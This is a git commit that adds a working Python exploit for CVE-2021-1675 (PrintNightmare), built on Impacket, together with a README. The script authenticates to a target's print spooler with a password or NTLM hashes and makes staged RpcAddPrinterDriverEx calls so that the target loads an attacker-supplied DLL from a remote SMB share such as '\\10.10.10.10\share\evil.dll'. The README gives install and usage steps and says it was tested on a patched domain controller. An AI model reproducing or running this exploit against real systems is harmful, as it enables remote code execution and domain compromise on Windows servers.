PoC upload

Signed-off-by: cube0x0 <vidfelt@protonmail.com>
2 years ago · b94fddca41
parent a18547eef4
commit b94fddca41
3 changed files with 174 additions and 1 deletions
--- a/CVE-2021-1675.py
+++ b/CVE-2021-1675.py
@ -0,0 +1,126 @@
+#!/usr/bin/python3
+from impacket.dcerpc.v5 import rprn
+from impacket.dcerpc.v5 import transport
+import argparse
+import sys
+
+
+def connect(username, password, domain, lmhash, nthash, address, port):
+    binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address)
+    rpctransport = transport.DCERPCTransportFactory(binding)
+    
+    rpctransport.set_dport(port)
+    rpctransport.setRemoteHost(address)
+    
+    if hasattr(rpctransport, 'set_credentials'):
+        # This method exists only for selected protocol sequences.
+        rpctransport.set_credentials(username, password, domain, lmhash, nthash)
+    
+    print("[*] Connecting to {0}".format(binding))
+    try:
+        dce = rpctransport.get_dce_rpc()
+        dce.connect()
+        dce.bind(rprn.MSRPC_UUID_RPRN)
+    except:
+        print("[-] Connection Failed")
+        sys.exit(1)
+    print("[+] Bind OK")
+    return dce
+
+
+def main(username, password, domain, lmhash, nthash, address, port, share):
+    #connect
+    dce = connect(username, password, domain, lmhash, nthash, address, port)
+    
+    #build DRIVER_CONTAINER package
+    container_info = rprn.DRIVER_CONTAINER()
+    container_info['Level'] = 2
+    container_info['DriverInfo']['tag'] = 2
+    container_info['DriverInfo']['Level2']['cVersion']     = 3
+    container_info['DriverInfo']['Level2']['pName']        = "1234\x00"
+    container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
+    container_info['DriverInfo']['Level2']['pDriverPath']  = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00"
+    container_info['DriverInfo']['Level2']['pDataFile']    = "{0}\x00".format(share)
+    container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\kernelbase.dll\x00"
+
+
+    flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
+    handle = "\\\\{0}\x00".format(address)
+    filename = share.split("\\")[-1]
+
+    print("[*] Uploading {0}".format(share))
+
+    #stage 0
+    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
+    print("[*] Stage0: {0}".format(resp['ErrorCode']))
+
+    #stage 1
+    container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\{0}\x00".format(filename)
+    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
+    print("[*] Stage1: {0}".format(resp['ErrorCode']))
+
+    #stage 2
+    container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\2\\{0}\x00".format(filename)
+    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
+    print("[*] Stage2: {0}".format(resp['ErrorCode']))
+
+    #stage 3
+    container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\3\\{0}\x00".format(filename)
+    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
+    print("[*] Stage3: {0}".format(resp['ErrorCode']))
+    
+    if (resp['ErrorCode'] == 0):
+        print("[+] Exploit Completed")
+    else:
+        print("[-] Not Completed")
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
+Example;
+./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll'
+    """)
+    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
+    parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')
+    group = parser.add_argument_group('authentication')
+    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
+    group = parser.add_argument_group('connection')
+    group.add_argument('-target-ip', action='store', metavar="ip address",
+                       help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
+                            'This is useful when target is the NetBIOS name and you cannot resolve it')
+    group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
+                       help='Destination port to connect to SMB Server')
+
+    if len(sys.argv)==1:
+        parser.print_help()
+        sys.exit(1)
+
+    options = parser.parse_args()
+
+    import re
+    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
+        options.target).groups('')
+
+    #In case the password contains '@'
+    if '@' in address:
+        password = password + '@' + address.rpartition('@')[0]
+        address = address.rpartition('@')[2]
+
+    if options.target_ip is None:
+        options.target_ip = address
+
+    if domain is None:
+        domain = ''
+
+    if password == '' and username != '' and options.hashes is None:
+        from getpass import getpass
+        password = getpass("Password:")
+
+    if options.hashes is not None:
+        lmhash, nthash = options.hashes.split(':')
+    else:
+        lmhash = ''
+        nthash = ''
+
+
+    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
--- a/Images/poc.png
+++ b/Images/poc.png
--- a/README.md
+++ b/README.md
@ -1,2 +1,49 @@
 # CVE-2021-1675
-Impacket implemenation of CVE-2021-1675
+
+Impacket implementation of the [PrintNightmare ](https://github.com/afwu/PrintNightmare) PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)
+
+Tested on a fully patched 2019 Domain Controller
+
+Execute malicious DLL's remote or locally
+
+![](Images/poc.png)
+
+### Installation
+
+Before running the exploit you need to install my version of Impacket and after that you're gucci
+
+```
+git clone https://github.com/cube0x0/impacket
+cd impacket
+python3 ./setup.py install
+```
+
+#### CVE-2021-1675.py
+
+```
+usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share
+
+CVE-2021-1675 implementation.
+
+positional arguments:
+  target                [[domain/]username[:password]@]<targetName or address>
+  share                 Path to DLL. Example '\\10.10.10.10\share\evil.dll'
+
+optional arguments:
+  -h, --help            show this help message and exit
+
+authentication:
+  -hashes LMHASH:NTHASH
+                        NTLM hashes, format is LMHASH:NTHASH
+
+connection:
+  -target-ip ip address
+                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name
+                        and you cannot resolve it
+  -port [destination port]
+                        Destination port to connect to SMB Server
+
+Example;
+./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
+```
+